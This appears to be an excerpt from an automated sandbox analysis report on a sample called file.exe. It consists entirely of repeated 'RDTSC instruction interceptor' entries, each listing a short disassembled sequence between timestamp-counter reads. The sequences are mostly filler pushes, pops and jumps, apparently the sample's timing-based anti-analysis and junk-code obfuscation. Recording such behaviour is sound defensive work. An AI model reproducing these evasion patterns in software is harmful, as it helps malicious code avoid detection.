Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC3C51 second address: DC3C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007FD288CC4A6Eh 0x0000000b jmp 00007FD288CC4A70h 0x00000010 push ebx 0x00000011 jo 00007FD288CC4A66h 0x00000017 push edi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC3C88 second address: DC3C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD2884F85C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC8F22 second address: DC8F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCEF9A second address: DCEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CEh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF402 second address: DCF414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF566 second address: DCF58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CCh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FD2884F85D1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF58E second address: DCF592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF6F6 second address: DCF700 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2884F85C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF700 second address: DCF70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF70A second address: DCF71B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FD2884F85C8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF71B second address: DCF721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF986 second address: DCF98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF98A second address: DCF9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCF9AB second address: DCF9B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4A40 second address: DD4A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FD288CC4A6Ch 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4A61 second address: DD4A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4A67 second address: DD4A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FD288CC4A80h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4A8C second address: DD4AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD2884F85C6h 0x0000000a jmp 00007FD2884F85D4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD9565 second address: DD9569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD9569 second address: DD9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD2884F85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD9575 second address: DD958C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD288CC4A6Ch 0x00000008 push ecx 0x00000009 jnc 00007FD288CC4A66h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD90B1 second address: DD90C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD2884F85CAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD921C second address: DD923B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FD288CC4A70h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD923B second address: DD924A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FD2884F85C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD924A second address: DD9254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD9254 second address: DD9258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE67B7 second address: DE67E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FD288CC4A66h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jo 00007FD288CC4A7Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE63D8 second address: DE63DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE63DE second address: DE63E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE63E2 second address: DE63F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD2884F85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE63F2 second address: DE63F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE63F6 second address: DE641D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2884F85C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jne 00007FD2884F85D7h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEAB68 second address: DEAB7C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FD288CC4A6Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEAB7C second address: DEABA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD2884F85CCh 0x0000000b jmp 00007FD2884F85D8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEABA6 second address: DEABAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0E8E second address: DF0E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0E94 second address: DF0EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FD288CC4A66h 0x0000000b jmp 00007FD288CC4A6Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E00070 second address: E0008E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD2884F85D0h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0008E second address: E000AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007FD288CC4A78h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E004D2 second address: E004DF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E00F12 second address: E00F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E00F19 second address: E00F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E03D12 second address: E03D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E03D17 second address: E03D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E235FF second address: E2360B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD288CC4A66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E262FA second address: E262FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3BC68 second address: E3BC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD288CC4A66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3BC72 second address: E3BC9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD2884F85CEh 0x00000010 popad 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3F893 second address: E3F899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3F899 second address: E3F8AA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3F8AA second address: E3F8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3F8B0 second address: E3F8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FA56 second address: E3FA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FCD4 second address: E3FCEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD2884F85D5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FCEE second address: E3FCFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FD288CC4A66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FCFB second address: E3FD05 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2884F85C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E42251 second address: E42273 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FD288CC4A73h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44FBB second address: E44FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44FBF second address: E44FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E478D8 second address: E478FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD2884F85CDh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FD2884F85CAh 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47C5C second address: E47C92 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD288CC4A6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push edi 0x0000000e mov dword ptr [ebp+1246E304h], eax 0x00000014 pop edx 0x00000015 push 00000004h 0x00000017 and edx, dword ptr [ebp+122D1EB4h] 0x0000001d push 35B5F192h 0x00000022 push eax 0x00000023 push edx 0x00000024 je 00007FD288CC4A6Ch 0x0000002a je 00007FD288CC4A66h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47F22 second address: E47F28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390ECA second address: 5390EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A70h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390EDE second address: 5390EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390EE2 second address: 5390F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD288CC4A73h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390F00 second address: 5390F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D87 second address: 5380D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D8D second address: 5380D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380D91 second address: 5380DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, 063Bh 0x0000000e mov si, CB17h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FD288CC4A6Ah 0x00000019 mov ebp, esp 0x0000001b jmp 00007FD288CC4A70h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FD288CC4A6Dh 0x00000029 pop eax 0x0000002a mov bx, 0594h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0682 second address: 53C0695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov cx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0695 second address: 53C0699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0699 second address: 53C069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C069F second address: 53C0703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov si, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e movsx edx, ax 0x00000011 mov esi, 1C411713h 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a movzx esi, di 0x0000001d mov bh, 11h 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FD288CC4A75h 0x00000029 pop eax 0x0000002a pushfd 0x0000002b jmp 00007FD288CC4A71h 0x00000030 and ax, 5736h 0x00000035 jmp 00007FD288CC4A71h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360173 second address: 536018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536018F second address: 5360193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360193 second address: 5360199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360199 second address: 536019F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536019F second address: 53601A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380A2E second address: 5380A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380A32 second address: 5380A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380634 second address: 538064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A6Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538064B second address: 5380668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53804E0 second address: 5380557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD288CC4A6Fh 0x00000008 pushfd 0x00000009 jmp 00007FD288CC4A78h 0x0000000e xor eax, 2365FB88h 0x00000014 jmp 00007FD288CC4A6Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FD288CC4A79h 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD288CC4A78h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380557 second address: 538055B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538055B second address: 5380561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380561 second address: 538058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2884F85D7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538058E second address: 5380593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380593 second address: 53805A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 15D8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53805A5 second address: 53805A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53805A9 second address: 53805AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53802B6 second address: 53802F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD288CC4A70h 0x0000000f push eax 0x00000010 jmp 00007FD288CC4A6Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53802F0 second address: 53802F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53802F4 second address: 53802FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390106 second address: 539010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539010C second address: 5390184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 034Dh 0x0000000f pushfd 0x00000010 jmp 00007FD288CC4A6Ah 0x00000015 xor eax, 4188B268h 0x0000001b jmp 00007FD288CC4A6Bh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FD288CC4A72h 0x0000002c add eax, 1EAD84C8h 0x00000032 jmp 00007FD288CC4A6Bh 0x00000037 popfd 0x00000038 jmp 00007FD288CC4A78h 0x0000003d popad 0x0000003e rdtsc
